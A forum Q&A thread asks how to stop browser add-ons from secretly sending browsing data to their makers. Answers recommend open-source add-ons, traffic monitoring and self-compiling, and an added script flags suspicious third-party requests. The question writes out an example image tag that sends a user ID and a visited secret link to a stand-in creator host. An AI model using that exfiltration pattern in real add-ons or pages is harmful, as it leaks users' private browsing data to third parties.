Prevent browser addons from "phoning home"

0

In principle, any browser add-on can spy on me by collecting browser history, webmail or other sensitive data. AFAIKS, it could send this data back to its creator using either XMLHttpRequest() or fetch() or by manipulating the DOM, e.g. adding something like

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

triggering an HTTP request to the add-on creator's page with the possibility to send any data he likes. However, not all add-ons need to make HTTP requests or manipulate the DOM.

Hence the question:

Is there some existing solution for some browsers that restricts the JavaScript functionality accessible to an add-on - specifically to DOM manipulation and HTTP requests?

Thomas W.

Posted 2016-11-01T17:54:32.523

Reputation: 308

Answers

2

I'm not sure, but it would depend on your browser. You could only use open source plugins, which would allow you to check if they phone home. Also, you could use something like Wireshark to look for any requests sent by the browser process to an IP other than the website you are visiting. Also, if you are using Firefox, there is lots of phoning home to Mozilla, unless you disable telemetry and I believe one other option in about:config. I forget the other option, but you could find it here. I'm not sure about how to stop a plugin from phoning home; I guess you could try to custom build Firefox and somehow modify the way plugins are run to keep them from sending web requests. This would make most plugins useless though, because they often have to send web requests to work.

To verify that an open source add-on has not been tampered with, you can compile it yourself. This tutorial shows you how to install jpm, which can compile Firefox extensions. Once you install jpm, run:

jpm xpi

in the plugin source directory to generate an xpi extension file. Then open the xpi, which should install it. It will likely tell you it's untrusted; that's because it was compiled and not signed or on the Mozilla add-on website. This should work for most extensions, unless they are very old.

jellyfishcoder

Posted 2016-11-01T17:54:32.523

Reputation: 36
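The answer suggests watching the browser's traffic for requests to hosts other than the site being visited. As an added example (not the answer author's code), the following Python script applies that check to a few constructed request records of the kind one might export from a capture: each record pairs the page the user is viewing with a URL the browser requested, and third-party requests whose query string carries the visited domain are flagged separately. The field layout, host names and `u=` parameter are assumptions for the example.

```python
from urllib.parse import urlparse, parse_qs

# Constructed sample records: (page the user is viewing, URL the browser requested).
# Made up for this example; a real list would come from a capture export.
SAMPLE_REQUESTS = [
    ("https://sensitive-page.com/inbox", "https://sensitive-page.com/api/messages"),
    ("https://sensitive-page.com/inbox", "https://cdn.sensitive-page.com/app.js"),
    ("https://sensitive-page.com/inbox",
     "http://addon-creators-page.com/?userid=uniqueId"
     "&u=https://sensitive-page.com/secret-link-i-visited"),
    ("https://sensitive-page.com/inbox", "https://cdn.example-analytics.net/beacon.gif"),
]

def registrable_domain(host):
    """Crude eTLD+1 (last two labels); adequate for the .com/.net hosts used here."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()

def is_third_party(page_url, request_url):
    """True when the request goes to a different registrable domain than the page."""
    page_dom = registrable_domain(urlparse(page_url).hostname or "")
    req_dom = registrable_domain(urlparse(request_url).hostname or "")
    return page_dom != req_dom

def leaks_page_data(page_url, request_url):
    """True if any query parameter of the request embeds the visited site's domain,
    which is what a URL smuggled out in a parameter would look like."""
    page_dom = registrable_domain(urlparse(page_url).hostname or "")
    for values in parse_qs(urlparse(request_url).query).values():
        if any(page_dom in v.lower() for v in values):
            return True
    return False

def classify(records):
    """Return (request_url, verdict) for every third-party request in records."""
    findings = []
    for page, req in records:
        if not is_third_party(page, req):
            continue  # same site as the page: expected first-party traffic
        verdict = "EXFIL_SUSPECT" if leaks_page_data(page, req) else "THIRD_PARTY"
        findings.append((req, verdict))
    return findings

if __name__ == "__main__":
    for url, verdict in classify(SAMPLE_REQUESTS):
        print(f"{verdict:14} {url}")
```

Everything flagged THIRD_PARTY still needs a human look, since the answer notes that many add-ons legitimately make requests to work; the script only narrows the list.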

Good answer. The solution to me is use open source plugins only (and also open source browser) and make sure the binary has not been tampered with. – Marc.2377 – 2016-11-01T18:09:51.750

Originally I had another section in my question asking how to verify that an open source add-on was not tampered with - I think I'll add that back. – Thomas W. – 2016-11-01T18:42:43.677